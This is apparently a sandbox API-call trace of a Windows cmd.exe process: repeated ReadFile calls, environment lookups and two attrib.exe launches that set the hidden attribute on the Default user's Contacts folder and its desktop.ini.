hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.516] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.516] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.519] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.519] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.522] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.541] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.541] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0209.542] _close (_FileHandle=3) returned 0 [0209.542] GetConsoleTitleW (in: lpConsoleTitle=0x2cf760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.542] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.542] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.543] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.543] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.543] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.543] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.543] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.543] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf37c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf444 | out: lpAttributeList=0x2cf37c, lpSize=0x2cf444) returned 1 [0209.543] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf37c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf43c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf37c, lpPreviousValue=0x0) returned 1 [0209.543] GetStartupInfoW (in: lpStartupInfo=0x2cf338 | out: lpStartupInfo=0x2cf338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.543] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.543] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf3d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf424 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessInformation=0x2cf424*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfdc, dwThreadId=0x6f0)) returned 1 [0209.545] CloseHandle (hObject=0x50) returned 1 [0209.545] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.545] GetEnvironmentStringsW () returned 0x442c70* [0209.545] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.545] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0209.581] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf318 | out: lpExitCode=0x2cf318*=0x0) returned 1 [0209.581] CloseHandle (hObject=0x4c) returned 1 [0209.581] _vsnwprintf (in: _Buffer=0x2cf460, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf324 | out: _Buffer="00000000") returned 8 [0209.581] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0209.581] GetEnvironmentStringsW () returned 0x442c70* [0209.582] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.582] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.582] GetEnvironmentStringsW () returned 0x442c70* [0209.582] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf37c | out: lpAttributeList=0x2cf37c) [0209.582] GetConsoleTitleW (in: lpConsoleTitle=0x2cf760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.583] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.583] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.583] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.583] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.583] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.583] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf37c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf444 | out: lpAttributeList=0x2cf37c, lpSize=0x2cf444) returned 1 [0209.583] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf37c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf43c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf37c, lpPreviousValue=0x0) returned 1 [0209.583] GetStartupInfoW (in: lpStartupInfo=0x2cf338 | out: lpStartupInfo=0x2cf338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.583] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.583] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf3d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Contacts\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf424 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessInformation=0x2cf424*(hProcess=0x50, hThread=0x4c, dwProcessId=0x828, dwThreadId=0x8c4)) returned 1 [0209.586] CloseHandle (hObject=0x4c) returned 1 [0209.586] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.586] GetEnvironmentStringsW () returned 0x443628* [0209.586] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0209.586] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0210.001] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf318 | out: lpExitCode=0x2cf318*=0x0) returned 1 [0210.001] CloseHandle (hObject=0x50) returned 1 [0210.001] _vsnwprintf (in: _Buffer=0x2cf460, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf324 | out: _Buffer="00000000") returned 8 [0210.001] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0210.001] GetEnvironmentStringsW () returned 0x443628* [0210.001] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0210.001] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.001] GetEnvironmentStringsW () returned 0x443628* [0210.001] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0210.001] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf37c | out: lpAttributeList=0x2cf37c) [0210.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.001] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.002] _get_osfhandle (_FileHandle=0) returned 0x3 